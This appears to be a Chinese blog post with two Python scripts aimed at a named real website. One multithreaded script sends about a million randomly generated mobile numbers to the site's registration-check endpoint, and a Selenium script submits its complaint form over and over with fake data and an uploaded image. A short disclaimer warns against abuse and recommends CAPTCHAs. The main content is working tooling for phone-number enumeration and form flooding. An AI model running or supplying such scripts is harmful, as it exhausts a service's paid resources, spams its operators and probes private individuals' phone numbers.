生产者消费者模式
声明: 大家不要用这种方式恶意消耗别人付费资源,损失严重可能要承担法律后果,另外如果有条件建议后端开发时候增加图形验证码,好多短信炸弹都是采集这种”大开门”接口作为资源
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64
| import random import sys import time from queue import Queue import threading
import requests
def get_phone_num(): second_spot = random.choice([3, 5, 7, 8]) third_spot = {3: random.randint(0, 9), 4: random.choice([5, 7, 9]), 5: random.choice([i for i in range(10) if i != 4]), 7: random.choice([i for i in range(10) if i not in [4, 9]]), 8: random.randint(0, 9), }[second_spot] remain_spot = random.randint(9999999, 100000000) phone_num = "1{}{}{}".format(second_spot, third_spot, remain_spot) return phone_num
class Producer(threading.Thread): def __init__(self, telQ, *args, **kwargs): super(Producer, self).__init__(*args, **kwargs) self.telQ = telQ
def run(self): pass
class Consumer(threading.Thread): def __init__(self, telQ, *args, **kwargs): super(Consumer, self).__init__(*args, **kwargs) self.telQ = telQ
def run(self): while True: if not self.telQ.empty(): url = 'https://www.bangkao.com/register/checkPhoneIsRegister.action' data = { "mobile": self.telQ.get() } response = requests.post(url, data=data) print(response.text) else: exit() def main(): telQ = Queue(1000000)
for x in range(1, 999999): phone = get_phone_num() telQ.put(phone)
for x in range(1): t = Producer(telQ) t.start()
for x in range(100): t = Consumer(telQ) t.start()
if __name__ == '__main__': main()
|
Selenium方式提交表单
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41
| import random import requests import threading import time from queue import Queue from selenium import webdriver
class Go: def __init__(self): self.options = webdriver.ChromeOptions() self.options.add_argument('-headless') self.driver = webdriver.Chrome(executable_path=r"/Users/thomasliew/Downloads/chromedriver", options=self.options, ) try: self.driver.set_page_load_timeout(0) self.driver.get("chrome://version/") except: pass self.driver.set_page_load_timeout(60) self.driver.execute_script("window.open('%s')" % "https://www.bangkao.com/tousu.html") self.driver.switch_to.window(self.driver.window_handles[1]) tel = '1' tel += str(random.randint(3, 8)) for i in range(9): tel += str(random.randint(0, 9)) type_dom = self.driver.find_element_by_id('ts_radio3') time.sleep(.5) self.driver.execute_script("$('#ts_radio1').click()") advise_dom = self.driver.find_element_by_id('question_advise') advise_dom.send_keys('{}'.format(str(random.randint(1, 999999)))) tel_dom = self.driver.find_element_by_id('question_tel') tel_dom.send_keys(tel) upele = self.driver.find_element_by_id('screenshot') upele.send_keys('/Users/thomasliew/Desktop/请不要办公楼内吸烟感谢理解.jpeg') time.sleep(3) submit_btn_dom = self.driver.find_element_by_xpath("//button[contains(text(),'提交投诉')]") submit_btn_dom.click() time.sleep(1) self.driver.close() self.driver.quit() self.__init__() go = Go()
|